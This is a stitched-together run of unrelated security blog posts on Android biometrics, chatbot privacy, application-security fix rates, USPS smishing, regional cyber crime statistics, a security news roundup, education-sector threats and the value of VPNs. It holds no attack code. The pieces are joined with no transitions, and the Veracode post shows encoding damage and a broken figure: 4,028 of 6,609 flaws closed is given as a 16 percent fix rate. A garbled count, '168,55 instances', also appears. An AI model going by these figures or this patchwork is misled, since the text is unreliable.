    While both Trusted Places and Trusted Devices (and tertiary modalities in general) offer convenient ways to get access to the contents of your device, the fundamental issue they share is that they are ultimately a poor proxy for user identity. For example, an attacker could unlock a misplaced phone that uses Trusted Place simply by driving it past the user's home, or with moderate amount of effort, spoofing a GPS signal using off-the-shelf Software Defined Radios and some mild scripting. Similarly with Trusted Device, access to a safelisted bluetooth device also gives access to all data on the user’s phone.

    Because of this, a major improvement has been made to the environmental tier in Android 10. The Tertiary tier was switched from an active unlock mechanism into an extending unlock mechanism instead. In this new mode, a tertiary tier modality can no longer unlock a locked device. Instead, if the device is first unlocked using either a primary or secondary modality, it can continue to keep it in the unlocked state for a maximum of four hours.

A closer look at Android biometrics

Biometric implementations come with a wide variety of security characteristics, so we rely on the following two key factors to determine the security of a particular implementation:

  1. Architectural security: The resilience of a biometric pipeline against kernel or platform compromise. A pipeline is considered secure if kernel and platform compromises don’t grant the ability to either read raw biometric data, or inject synthetic data into the pipeline to influence an authentication decision.
  2. Spoofability: Is measured using the Spoof Acceptance Rate (SAR). SAR is a metric first introduced in Android P, and is intended to measure how resilient a biometric is against a dedicated attacker. Read more about SAR and its measurement in Measuring Biometric Unlock Security.

We use these two factors to classify biometrics into one of three different classes in decreasing order of security:

  • Class 3 (formerly Strong)
  • Class 2 (formerly Weak)
  • Class 1 (formerly Convenience)

Each class comes with an associated set of constraints that aim to balance their ease of use with the level of security they offer.

These constraints reflect the length of time before a biometric falls back to primary authentication, and the allowed application integration. For example, a Class 3 biometric enjoys the longest timeouts and offers all integration options for apps, while a Class 1 biometric has the shortest timeouts and no options for app integration. You can see a summary of the details in the table below, or the full details in the Android Android Compatibility Definition Document (CDD).

1 App integration means exposing an API to apps (e.g., via integration with BiometricPrompt/BiometricManager, androidx.biometric, or FIDO2 APIs)

2 Keystore integration means integrating Keystore, e.g., to release app auth-bound keys

Benefits and caveats

Biometrics provide convenience to users while maintaining a high level of security. Because users need to set up a primary authentication modality in order to use biometrics, it helps boost the lockscreen adoption (we see an average of 20% higher lockscreen adoption on devices that offer biometrics versus those that do not). This allows more users to benefit from the security features that the lockscreen provides: gates unauthorized access to sensitive user data and also confers other advantages of a primary authentication modality to these users, such as encrypted backups. Finally, biometrics also help reduce shoulder surfing attacks in which an attacker tries to reproduce a PIN, pattern, or password after observing a user entering the credential.

However, it is important that users understand the trade-offs involved with the use of biometrics. Primary among these is that no biometric system is foolproof. This is true not just on Android, but across all operating systems, form-factors, and technologies. For example, a face biometric implementation might be fooled by family members who resemble the user or a 3D mask of the user. A fingerprint biometric implementation could potentially be bypassed by a spoof made from latent fingerprints of the user. Although anti-spoofing or Presentation Attack Detection (PAD) technologies have been actively developed to mitigate such spoofing attacks, they are mitigations, not preventions.

One effort that Android has made to mitigate the potential risk of using biometrics is the lockdown mode introduced in Android P. Android users can use this feature to temporarily disable biometrics, together with Smart Lock (for example, Trusted Places and Trusted Devices) as well as notifications on the lock screen, when they feel the need to do so.

To use the lockdown mode, users first need to set up a primary authentication modality and then enable it in settings. The exact setting where the lockdown mode can be enabled varies by device models, and on a Google Pixel 4 device it is under Settings > Display > Lock screen > Show lockdown option. Once enabled, users can trigger the lockdown mode by holding the power button and then clicking the Lockdown icon on the power menu. A device in lockdown mode will return to the non-lockdown state after a primary authentication modality (such as a PIN, pattern, or password) is used to unlock the device.

BiometricPrompt - New APIs

In order for developers to benefit from the security guarantee provided by Android biometrics and to easily integrate biometric authentication into their apps to better protect sensitive user data, we introduced the BiometricPrompt APIs in Android P.

There are several benefits of using the BiometricPrompt APIs. Most importantly, these APIs allow app developers to target biometrics in a modality-agnostic way across different Android devices (that is, BiometricPrompt can be used as a single integration point for various biometric modalities supported on devices), while controlling the security guarantees that the authentication needs to provide (such as requiring Class 3 or Class 2 biometrics, with device credential as a fallback). In this way, it helps protect app data with a second layer of defenses (in addition to the lockscreen) and in turn respects the sensitivity of user data. Furthermore, BiometricPrompt provides a persistent UI with customization options for certain information (for example, title and description), offering a consistent user experience across biometric modalities and across Android devices.

As shown in the following architecture diagram, apps can integrate with biometrics on Android devices through either the framework API or the support library (that is, androidx.biometric for backward compatibility). One thing to note is that FingerprintManager is deprecated because developers are encouraged to migrate to BiometricPrompt for modality-agnostic authentications.

Improvements to BiometricPrompt

Android 10 introduced the BiometricManager class that developers can use to query the availability of biometric authentication and included fingerprint and face authentication integration for BiometricPrompt.

In Android 11, we introduce new features such as the BiometricManager.Authenticators interface which allows developers to specify the authentication types accepted by their apps, as well as additional support for auth-per-use keys within the BiometricPrompt class.

More details can be found in the Android 11 preview and Android Biometrics documentation. Read more about BiometricPrompt API usage in our blog post Using BiometricPrompt with CryptoObject: How and Why and our codelab Login with Biometrics on Android.

What you Should Know About Chatbots and Cybersecurity

Reading Time: ~ 4 min.

People’s fears and fantasies about artificial intelligence predate even computers. Before the term was coined in 1956, computing pioneer Alan Turing was already speculating about whether machines could think.

By 1997 IBM’s Deep Blue had beaten chess champion Gary Kasparov at his own game, prompting hysterical headlines and the game Go to replace chess as the symbolic bar for human vs. machine intelligence. At least until 2017 when Google’s AI platform AlphaGo ended human supremacy in that game too.

This brief run through major milestones in AI helps illustrate how the technology has progressed from miraculous to mundane. AI now has applications for nearly every imaginable industry including marketing, finance, gaming, infrastructure, education, space exploration, medicine and more. It’s gone from unseating Jeopardy! champions to helping us do our taxes.

In fact, imagine the most unexciting interactions that fill your day. Those to-dos you put off until it’s impossible to any longer. I’m talking about contacting customer support. AI now helps companies do this increasingly in the form of chatbots. The research firm Gartner tells us consumers appreciate AI for its ability to save them time and for providing them with easier access to information.

Companies, on the other hand, appreciate chatbots for their potential to reduce operating costs. Why staff a call center of 100 people when ten, supplemented by chatbots, can handle a similar workload? According to Forrester, companies including Nike, Apple, Uber and Target “have moved away from actively supporting email as a customer service contact channel” in favor of chatbots.

So, what could go wrong, from a cybersecurity perspective, with widespread AI in the form of customer service chatbots? Webroot principal software engineer Chahm An has a couple of concerns.

Privacy

Consider our current situation: the COVID-19 crisis has forced the healthcare industry to drastically amplify its capabilities without a corresponding rise in resources. Chatbots can help, but first they need to be trained.

“The most successful chatbots have typically seen the data that most closely matches their application,” says An. Chatbots aren’t designed like “if-then” programs. Their creators don’t direct them. They feed them data that mirrors the tasks they will expected to perform.

“In healthcare, that could mean medical charts and other information protected under HIPAA.” A bot can learn the basics of English by scanning almost anything on the English-language web. But to handle medical diagnostics, it will need to how real-world doctor-patient interactions unfold.

“Normally, medical staff are trained on data privacy laws, rules against sharing personally identifiable information and how to confirm someone’s identity. But you can’t train chatbots that way. Chatbots have no ethics. They don’t learn right from wrong.”

This concern is wider than just healthcare, too. All the data you’ve ever entered on the web could be used to train a chatbot: social media posts, home addresses, chats with human customer service reps…in unscrupulous or data-hungry hands, it’s all fair game.

Finally in terms of privacy, chatbots can also be gamed into giving away information. A cybercriminal probing for SSNs can tell a chatbot, ‘I forgot my social security. Can you tell it to me?’ and sometimes be successful because the chatbot succeeds by coming up with an answer.

“You can game people into giving up sensitive information, but chatbots may be even more susceptible to doing so,” warns An.

Legitimacy

Until recently chatbot responses were obviously potted, and the conversations directed. But they’re getting better. And this raises concerns about knowing who you’re really talking to online.

“Chatbots have increased in popularity because they’ve become so good you could mistake them for a person,” says An. “Someone who is cautious should still have no problem identifying one, by taking the conversation wildly off course, for instance. But if you’re not paying attention, they can be deceptive.”

An likens this to improvements in phishing attempts over the past decade. As phishing filters have improved—by blocking known malicious IP addresses or subject lines commonly used by scammers, for example—the attacks have gotten more subtle. Chatbots are experiencing a similar arms-race type of development as they improve at passing themselves off as real people. This may benefit the user experience, but it also makes them more difficult to detect. In the wrong hands, that seeming authenticity can be dangerously applied.

Because chatbots are also expensive and difficult to create, organizations may take shortcuts to catch up. Rather than starting from scratch, they’ll look for chatbots from third-party vendors. While more reputable institutions will have thought through chatbot privacy concerns, not all of them do.

“It’s not directly obvious that chatbots could leak sensitive or personally identifiable information that they are indirectly learning,” An says.

Chatbot security and you – what can be done?

1. Exercise caution in conversations

Don’t be afraid to start by asking if a customer service rep is a real person or a bot. Ask what an organization’s privacy policy says about chat logs. Even ask to speak with a manager or to conduct sensitive exchanges via an encrypted app. But regardless, exercise caution when exchanging information online.

“It used be any time you saw a web form or dialogue box, that heightened our caution. But nowadays people are publishing so much online that our collective guard is kind of down. People should be cautious even if they know they’re not speaking directly to a chatbot,” An advises.

In general, don’t put anything on the internet you wouldn’t want all over the internet.

2. Understand chatbot capabilities

“I think most people who aren’t following this issue closely would be surprised at the progress chatbots have made in just the last year or so,” says An. “The conversational ability of chatbots is pretty impressive today.”

GPT-3 by OpenAI is “the largest language model ever created and can generate amazing human-like text on demand,” according to MIT’s Technology Review and you can see what it can do here. Just knowing what it’s capable of can help internet users decide whether they’re dealing with a bot, says An.

“Both sides will get better at this. Cybersecurity is always trying to get better and cybercriminals are trying to keep pace. This technology is no different. Chatbots will continue to develop.”

The post What you Should Know About Chatbots and Cybersecurity appeared first on Webroot Blog.

Focus on Fixing, Not Just Finding, Vulnerabilities

When investing in an application security (AppSec) program, you expect to see a return on your investment. But in order to recognize a return, your organization needs to determine what success looks like and find a way to measure and prove that the program is meeting your definition of success.

For those just starting on their AppSec journey, success might be eliminating OWASP Top 10 vulnerabilities or lowering flaw density. But as you begin to mature your program and work toward continuous improvements, you should start measuring your program against key performance indicators (KPIs) like fix rate. Fix rate is used to indicate how fast your organization is closing ??? or remediating ??? flaws. The formula for fix rate is the number of findings closed divided by the number of findings open. As you can see in the diagram below, of the 6,609 flaws, 2,581 flaws areツ?open and 4,028 are closed. This means that flaws are remediated at a rate of 16 percent. The faster your organization fixes flaws, the lower the chances of an exploit. For the sake of continuous improvement, you should be finding that your organization is improving its fix rate by remediating flaws faster year over year.

Fix rate

ツ?

Using Veracode Analytics to examine fix rate and prove AppSec success.

Using Veracode Analytics custom dashboards, you can examine your total fix rate or break it out by application, scrum team, business unit, or geographical location. These dashboards can be shared with stakeholders and executives to show areas where your fix rate is improving or areas that need additional attention and resources.

When examining fix rate across applications, you should be finding that your more critical applications have a better fix rate. If that???s not the case, you need to be examining the application security policies you have in place for fixing flaws. High-severity and highly exploitable flaws should be prioritized over low-severity flaws with a lower chance of exploitability. The same logic applies to applications: High-risk applications storing large amounts of sensitive data should be prioritized.

When examining the fix rate across scrum teams and locations, you should find that teams and geographical locations are continuously improving their fix rate. If not, you should use the data to tailor future security trainings or to ask stakeholders and executives for additional resources.

How does fix rate impact return on investment?

By remediating flaws faster, you are reducing the chance of an exploit which could cost your business thousands ??? even millions ??? to resolve. For example, Capital One had a third-party vulnerability that was not remediated, and it led to a massive data breach which exposed its customer???s social security numbers and bank account numbers. It cost Capital One approximately 150 million dollars to resolve the matter.

Faster time to remediation also means faster time to production. Once developers fix all of the flaws defined in their policy, code can be moved to production. If code is moved to production at a faster rate, an organization ??? and its customers ??? can start recognizing value from the application sooner.

ツ?

For additional methods on proving AppSec success, check out our recent video, How to Use Analytics to Measure AppSec ROI.

Special Delivery: Don’t Fall for the USPS SMiShing Scam

Special Delivery: Don’t Fall for the USPS SMiShing Scam

According to Statista, 3.5 billion people worldwide are forecasted to own a smartphone by the end of 2020. These connected devices allow us to have a wealth of apps and information constantly at our fingertips – empowering us to remain in constant contact with loved ones, make quick purchases, track our fitness progress, you name it. Hackers are all too familiar with our reliance on our smartphones – and are eager to exploit them with stealthy tricks as a result.

One recent example of these tricks? Suspicious text messages claiming to be from USPS. According to Gizmodo, a recent SMS phishing scam is using the USPS name and fraudulent tracking codes to trick users into clicking on malicious links.

Let’s dive into the details of this scheme, what it means for users, and what you can do to protect yourself from SMS phishing.

Special Delivery: Suspicious Text Messages

To orchestrate this phishing scheme, hackers send out text messages from random numbers claiming that a user’s delivery from USPS, FedEx, or another delivery service is experiencing a transit issue that requires urgent attention. If the user clicks on the link in the text, the link will direct them to a form fill page asking them to fill in their personal and financial information to “verify their purchase delivery.” If the form is completed, the hacker could exploit that information for financial gain.

However, scammers also use this phishing scheme to infect users’ devices with malware. For example, some users received links claiming to provide access to a supposed USPS shipment. Instead, they were led to a domain that did nothing but infect their browser or phone with malware. Regardless of what route the hacker takes, these scams leave the user in a situation that compromises their smartphone and personal data.

USPS Phishing Scam

Don’t Fall for Delivery Scams

While delivery alerts are a convenient way to track packages, it’s important to familiarize yourself with the signs of phishing scams – especially as we approach the holiday shopping season. Doing so will help you safeguard your online security without sacrificing the convenience of your smartphone. To do just that, follow these actionable steps to help secure your devices and data from SMiShing schemes:

Go directly to the source

Be skeptical of text messages claiming to be from companies with peculiar asks or information that seems too good to be true. Instead of clicking on a link within the text, it’s best to go straight to the organization’s website to check on your delivery status or contact customer service.

Enable the feature on your mobile device that blocks certain texts

Many spammers send texts from an internet service in an attempt to hide their identities. Combat this by using the feature on your mobile device that blocks texts sent from the internet or unknown users. For example, you can disable all potential spam messages from the Messages app on an Android device by navigating to Settings, clicking on Spam protection, and turning on the Enable spam protection switch. Learn more about how you can block robotexts and spam messages on your device.

Use mobile security software

Prepare your mobile devices for any threat coming their way. To do just that, cover these devices with an extra layer of protection via a mobile security solution, such as McAfee Mobile Security.

Stay updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Special Delivery: Don’t Fall for the USPS SMiShing Scam appeared first on McAfee Blogs.

Fall 2020 NICE eNewsletter Available

The Fall 2020 NICE eNewsletter is available now. The NICE eNewsletter is published quarterly to provide information on academic, industry, and government developments related to the National Initiative for Cybersecurity Education (NICE), updates from key NICE programs, projects, the NICE Working Group, and other important news. For additional archived issues please click here.

How social media is used to commit financial fraud

Social media is a fraudster’s heaven. There are billions of targets – Facebook itself had over 2.6 billion monthly active users in the first quarter of 2020. Because of the very nature of these platforms, users can be quite careless about the amount of personal information they post. For cybercriminals,…

Cambridgeshire crowned the UK’s cyber crime capital

Cambridgeshire has the unwanted distinction of being the UK’s fastest-growing hotspot for cyber crime, after the number of attacks in the county increased by 49% over a three-year period.

Figures from the ONS (Office of National Statistics) show that security incidents in Cambridgeshire increased from 2,789 in 2016 to 4,155 in 2018.

Although the total number of attacks trails the Thames Valley – which saw 11,232 attacks per year on average – Cambridgeshire had the fastest rate of increase and largest total per capita.

In 2018, Cambridgeshire saw 63.7 cyber attacks per 10,000 people, compared to 48 per 10,000 in the Thames Valley.

The next most densely populated regions for cyber crime were Leicestershire (59.2) and Nottinghamshire (56.4).

What is happening in Cambridgeshire?

At first glance, these figures – which were collated by the Internet service provider Fasthosts – suggest that Cambridgeshire is some sort of Wild West for cyber crime.

Attacks in the region have skyrocketed in recent years, with only North Wales (+47%) seeing a comparable increase.

One reason to account for this is that the timeframe of this analysis coincides with major economic growth in the region.

In 2017, Cambridge became the fastest-growing city in the UK, with businesses attracted to its proximity to London and the North, as well as its highly educated workforce.

The city trails only Edinburgh in terms of residents who are educated to undergraduate degree-level, making it an ideal spot for organisations in technical industries, such as biotech, digital innovation and medicine.

And, of course, Cambridge is home of one of the most world’s prestigious universities, with its various colleges employing almost 8,000 academic and more than 3,500 administrative staff.

Unfortunately, these sectors are especially prone to cyber attacks due to the sensitive information that they keep.

For example, the pharmaceutical giant AstraZeneca, which is based in Cambridge, was last year imitated in a sophisticated phishing scam targeting job seekers.

Meanwhile, universities have long been considered a cyber security liability, due to budgetary constraints and their necessarily wide networks.

In 2019, Jist – the agency that provides Internet services to UK universities and researcher centres – put 50 universities’ cyber security practices to the test, and found that their team of ethical hackers breached every one within two hours.

Protect your organisation

Cambridgeshire’s susceptibility to cyber attacks is particularly disheartening for us to hear at IT Governance, given that we’re based in the region.

We’ve helped local businesses with more than 1,000 projects, but there’s still clearly a long way to go when it comes to data protection.

One of the essential steps to cyber security is to educate your employees on the risks they face and the ways they can mitigate the risk.

Our Complete Staff Awareness E-learning Suite contains everything you need to stay secure, from organisations’ legal requirements to specific issues that employees face, such as phishing emails and social media scams.

The post Cambridgeshire crowned the UK’s cyber crime capital appeared first on IT Governance UK Blog.

Weekly Update 209

Weekly Update 209

More IoT, more cyber and more Q&A so yeah, business as usual this week. More specifically, a lot of this week's update talks about VPNs and where they still make sense with so much HTTPS all over the place these days. As I say in the vid, blog posts like the VPN one I did this week are often done to help me get my thoughts on a topic straight and a lot of things became a lot clearer for me in doing that. The headline figure out of that post IMHO is that only 2.3% of websites are forcing all connections to be secure courtesy of HSTS preload and the fact that browsers still default to the insecure scheme. More on that (and much more) in this week's update.

Weekly Update 209
Weekly Update 209
Weekly Update 209
Weekly Update 209

References

  1. The whisky tasting put on by Hacktive was a pretty neat digital experience (pic there from the event)
  2. There's been what's reported as the first death as a result of ransomware (I find it hard to believe it hasn't happened before, and it'll definitely happen again)
  3. The "3Ps" of VPN value proposition (where do they still make sense in an increasingly "secure by default" web?)
  4. Sponsored by: safepass.me helps you quickly secure your AD passwords and reduce the risk of Credential Stuffing

This Week in Security News: AWS Outposts Ready Launches With 32 Validated Partners and Staples Hit by a Data Breach

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how solutions from 32 Amazon Web Services partners – including Trend Micro – are now available for AWS customers to use with their deployments of AWS Outposts. Also, read about a data breach at U.S. office-supply retailer Staples.

 

Read on:

Boosting Impact for Profit: Evolving Ransomware Techniques for Targeted Attacks

As described in Trend Micro’s 2020 Midyear Roundup, the numbers pertaining to ransomware no longer tell the full story. While the number of infections, company disclosures, and ransomware families has gone down, the estimated amount of money exchanged for the retrieval of encrypted data has steadily gone up. By going after institutions and companies with the urgent need to retrieve their data and get their systems running again, cybercriminals are able to demand exorbitant amounts of ransom.

AWS Outposts Ready Launches with 32 Validated Partners

Solutions from 32 Amazon Web Services partners, including Trend Micro, are available now for AWS customers to use with their deployments of AWS Outposts, the on-premises version of the industry’s leading public cloud.

Analysis of a Convoluted Attack Chain Involving Ngrok

The Trend Micro Managed XDR team recently handled an incident involving one of Trend Micro’s customers. The incident revealed how a malicious actor incorporated certain techniques into an attack, making it more difficult for blue teams and security researchers alike to analyze the chain of events in a clean and easily understandable manner. In this blog, Trend Micro further analyzes the attack.

39% of Employees Access Corporate Data on Personal Devices

A large proportion of employees are using their own devices to access data belonging to their company, according to a new study by Trend Micro. Researchers found that 39% of workers use personal smartphones, tablets, and laptops to access corporate data, often via services and applications hosted in the cloud.

A Blind Spot in ICS Security: The Protocol Gateway Part 2: Vulnerability Allowing Stealth Attacks on Industrial Control Systems

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways and shares the security countermeasures that security administrators in smart factories must take. In the second part of this series, Trend Micro presents an overview of the verification methods, results of this research, and describes “flaws in the protocol conversion function,” one of the security risks revealed through Trend Micro’s experiments.

Staples Hit by Data Breach: What to Do Now

U.S. office-supply retailer Staples says its recent data breach affected fewer than 2,500 customers. Australian security researcher Troy Hunt, who runs the HaveIBeenPwned website, used his Twitter account to post a copy of an email message sent to an unknown number of Staples online customers.

“Zerologon” and the Value of Virtual Patching

A new CVE was released recently that has made quite a few headlines – CVE-2020-1472, also known as Zerologon. This CVE can allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller.

Billions of Devices Vulnerable to New ‘BLESA’ Bluetooth Security Flaw

Billions of smartphones, tablets, laptops, and IoT devices are using Bluetooth software stacks that are vulnerable to a new security flaw disclosed this summer. Named BLESA (Bluetooth Low Energy Spoofing Attack), the vulnerability impacts devices running the Bluetooth Low Energy (BLE) protocol. BLE is a slimmer version of the original Bluetooth (Classic) standard but designed to conserve battery power while keeping Bluetooth connections alive as long as possible.

California Elementary Kids Kicked Off Online Learning by Ransomware

As students head back to the classroom, the wave of ransomware attacks against schools is continuing. The latest is a strike against a California school district that closed down remote learning for 6,000 elementary school students, according to city officials. The cyberattack, against the Newhall School District in Valencia, affected all distance learning across 10 different grade schools.

Mobile Messengers Expose Billions of Users to Privacy Attacks

When installing a mobile messenger like WhatsApp, new users can instantly start texting existing contacts based on the phone numbers stored on their device. For this to happen, users must grant the app permission to access and regularly upload their address book to company servers in a process called mobile contact discovery. A new research study shows that currently deployed contact discovery services severely threaten the privacy of billions of users.

Should employees be able to access company data via their personal devices? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: AWS Outposts Ready Launches With 32 Validated Partners and Staples Hit by a Data Breach appeared first on .

The Phish Scale: NIST-Developed Method Helps IT Staff See Why Users Click on Fraudulent Emails

Researchers at the National Institute of Standards and Technology (NIST) have developed a new method called the Phish Scale that could help organizations better train their employees to avoid a particularly dangerous form of cyberattack known as phishing. By 2021, global cybercrime damages will cost $6 trillion annually, up from $3 trillion in 2015, according to estimates from the 2020 Official Annual Cybercrime Report by Cybersecurity Ventures. One of the more prevalent types of cybercrime is phishing, a practice where hackers send emails that appear to be from an acquaintance or trustworthy

Why has there been increase in cyber risks for the education sector?

The coronavirus pandemic has arguably affected the education sector more than any other, with schools, colleges and universities around the globe having been forced to close their doors and deliver classes remotely.

Most of the discussion surrounding this has focused on the logistical problems of setting up e-learning platforms, parents balancing their workloads with home-schooling and students completing exams.

However, one of the most significant issues – particularly in the long term – is that the pandemic has also exposed massive cyber security failings in the education sector.

Indeed, the UK’s National Cyber Security Centre released a security alert to schools and universities sector this week, warning that cyber criminals are targeting the education sector as students return after the summer.

We reported 17 cyber attacks on schools and universities in August alone, with many of those attacks being ransomware.

Newcastle University, for example, became one of the most high-profile victims earlier this month, after it was targeted by the DoppelPaymer ransomware gang.

There have also been countless cases of ‘Zoombombing’ – in which uninvited guests enter meetings to harass participants and snoop into people’s homes.

In one instance, a ‘Zoombomber’ disrupted an online class to shout a profanity, and in another, the virtual classroom was interrupted by someone streaming pornography.

Although some of these attacks are a direct response to schools’ ad hoc response to the pandemic, it’s not as though the education sector was especially resilient before being forced into online learning.

According to a UK government survey, 80% of UK schools experienced a cyber attack in 2019, and things aren’t any better in the US, with a report finding that cyber attacks against schools tripled last year.

This is the result of schools increasingly relying on technology – whether it’s online learning platforms, teaching tools or day-to-day operations – while neglecting the security concerns that come with it.

What kind of threats do schools face?

A recent Kaspersky report outlines several cyber security threats associated with online learning:

  • Phishing

Kaspersky notes that several bogus sites replicating Google Classroom and Zoom began popping up at the start of the pandemic.

According to Check Point Research, from the end of April to mid-June, 2,449 domains related to Zoom were registered, 32 of which were malicious and 320 were suspicious.

Fraudsters have also taken aim at Microsoft Teams and Google Meet, as well as universities’ online portals.

  • DDoS (distributed denial-of-service) attacks

Between February and June 2020, there was a 350–500% increase in DDoS attacks on the education sector compared to the same timeframe last year.

These attacks, which flood network traffic with requests until they are overwhelmed and crash, are usually performed to disrupt an organisation – perhaps as an act of revenge, a political statement or simply for fun – or to distract organisations while the attackers perform a more sophisticated attack.

  • Adware and malware

The most common threat that the education sector faces are downloaders, adware and Trojan horses.

This threat is almost exclusively related to the widespread implementation of Zoom. The video conferencing app saw a surge in popularity at the start of lockdown, and cyber criminals responded by creating bogus application installers.

Students and teachers have repeatedly been fooled into installing a bogus version of Zoom, unleashing malicious software onto their systems.

Kaspersky reports that, of the 168,55 instances of bogus application installations that it detected between January and June, 99.5% were associated with fake Zoom apps.

How should schools respond?

Despite schools and universities worldwide reopening their doors to students, digital learning continues to be an essential part of the way they operate – and these systems must be more resilient to attacks.

But although many organisations in the education sector know that they should be doing more, they might not know where to begin. That’s where our Cyber Security as a Service can help.

With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.

They’ll guide you through vulnerability scans, staff training and the creation of policies and procedures, which form the backbone of an effective security strategy.

The post Why has there been increase in cyber risks for the education sector? appeared first on IT Governance UK Blog.

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

I want a "secure by default" internet with all the things encrypted all the time such that people can move freely between networks without ever needing to care about who manages them or what they're doing with them. I'm a massive proponent of Let's Encrypt's and Cloudflare's missions to secure the web and of browser paradigms such as HSTS and upgrade-insecure-requests via content security policies to help make it a reality. Yet I also find myself constantly using VPNs for a variety of security and privacy related reasons and it got me thinking - why? I mean what's the remaining gap?

Last month I announced I've partnered with NordVPN as a strategic adviser and as part of that effort, I wanted to be a lot clearer in my own narrative around the value proposition of VPNs, especially as the web implements more encryption across more connections. As I started delving back through my own writing over the years, the picture became much clearer and it really crystallised just this week after I inadvertently landed on a nasty phishing site. I also started giving more thought to privacy and how it's constantly eroded in little bites, a thought process that highlighted just how far we still have to go as an industry, and where the value proposition of a VPN was strongest.

In the end I broke it down into 3 Ps: padlocks, phishing and privacy. Here's the value proposition of a VPN in the modern era:

1. HTTPS Still has a Long Way to Go

This is such a mess it's difficult to even know where to begin, so let me just start with the easy bits then progressively unveil just what a train wreck the current state of encrypted web traffic is. Here's one of our "Big 4" Aussie banks and as you can clearly see by virtue of the padlock, it's served over an HTTPS connection:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

Goodo! I know that what's on the page hasn't been modified in transit as it was loaded over the internet nor could anyone intercepting my traffic read it. The last bit is particularly important as I logon and would firstly, like my password not to be eavesdropped on and secondly, would also like to keep my financial information on the website secure. The great thing about the padlock in the browser is that it's assigned automatically by the browser itself; ANZ can't just say "let's whack a padlock up in the omnibar", they only get it if the page (and everything on it) is served securely. If I choose, I can click that padlock and inspect the certificate just to give me that extra peace of mind. Now let's try the mobile app:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

What's the encryption story there? No idea! What I do know is that years ago I reported a bug to ANZ about their mobile app having turned off certificate validation so even though it made an HTTPS connection, it would trust any certificate returned to the app, including one injected by an attacker. Ouch!

I also know that when ANZ updated their app a couple of years ago, they pushed it out by asking people to click on an insecure link that looked just like a phishing attack:

And just to go down the rabbit hole even further, as commendable as the first ANZ screen grab of the HTTPS address in the browser is, you can only get there by first making an insecure request which is what the browser defaults to when you type in "anz.com.au":

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

If you want to get technical about it, yes, there's HSTS involved but it's not preloaded so the first request will always be insecure. But that shouldn't be that surprising given that only 2.3% of the world's top 1 million websites are forcing the first request to be secure:

This isn't meant to be an ANZ-bashing session because let's face it, plenty of banks have had plenty of problems getting their encryption right in the past, but it shows you  just how many place there are for it to go wrong. I was reminded of just what a mess the landscape is just the other day after someone pointed me at a new financial app:

In the ensuing discussions I had about how much we can trust the transport layer, someone pointed out that it was only a few months ago that TikTok was found to be loading videos insecurely allowing the contents of them to be manipulated whilst loading. It's kinda unfathomable to think that this sort of thing is still happening, I was dismayed enough 5 years ago when reporting vulnerabilities likes this, yet here we still are.

Then there's the long, long tail of websites that still to this day, simply don't want to protect their visitors' traffic. For example, one of Australia's most popular websites is the bureau of meteorology, still served insecurely:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

And just in case you thought you'd fix this by using a browser extension such as HTTPS Everywhere, no, you can't:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

This is a baffling approach given they were actually able to respond to a request over HTTPS (so they have a valid cert), but then consciously chose to redirect the traffic to a non-secure address. And before we go down the "yeah but it's a static site so nothing can go wrong" path, all static sites should serve traffic over an encrypted connection for many, many good reasons.

2. A Secure Connection to Satan is Still a Connection to Satan

This tweet by my friend Scott Hanselman has well and truly stood the test of time:

I was reminded of this only a few days ago when I came across yet another Windows virus scam, the kind that's been doing the rounds for a decade now but refuses to die. It all started with a Google alert I have set up for the term "have i been pwned":

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

Initially, I was a little bit excited; does Netflix now have a way of checking your address directly against HIBP? Maybe they're plugging into the API directly from the account page there? Cool! However, moments later:

I saved you a copy of the audio as I'm sure the original one will disappear at some point. Imagine some poor unsuspecting person hearing that, seeing the warning on the screen then falling for the scam. These are massively prevalent and, per the screen grab, served over an encrypted HTTPS connection. But as Scott said earlier on, having privacy on your traffic doesn't mean you're communicating with someone you actually want to.

To test a theory, I fired up NordVPN which connected me to an exit node just up the road from me (that IP address is in Brisbane):

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

I've also got CyberSec enabled to kill nasty stuff off which I think it's fair to say, the scamming site above fits the bill:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

Hitting the same URL sent to me in the original Google alert led to quite a different result this time:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

This is precisely how it went down just this week with me receiving that Google alert, clicking the link and copping the full brunt of the scam. Clearly, I know better than to fall for it, but it did make me stop and wonder how many people do get taken for a ride by these scams.

And just in case you're wondering, the host name in the image where DNS didn't resolve is different to the final scam site as a lot of these phishes bounce you around across multiple domains. Doing a quick check now, with NordVPN off, my Pi-hole still resolved the domain:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

But turning on NordVPN with CyberSec enabled, the domain was black-holed back to my local IP:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

Now to be clear, I still love the Pi-hole (but let's face it, most people aren't going to be installing a Pi in their homes) and you're always going to have DNS block-lists at various states of readiness regarding new malicious domains, but I love CyberSec for the same reason in that by blocking content at the DNS level you can extend the reach well beyond an ad blocker alone. Every browser and every app on the device gets the benefit of known nasty content being binned as it's done at the OS level where DNS is defined and not on a per-client basis.

3. Security != Privacy

This is one of the most obvious value propositions of a VPN, but it deserves being examined in more detail anyway. Let's talk about privacy and I'll break it down into multiple layers beginning with this excellent drawing from Wassim Chegham:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

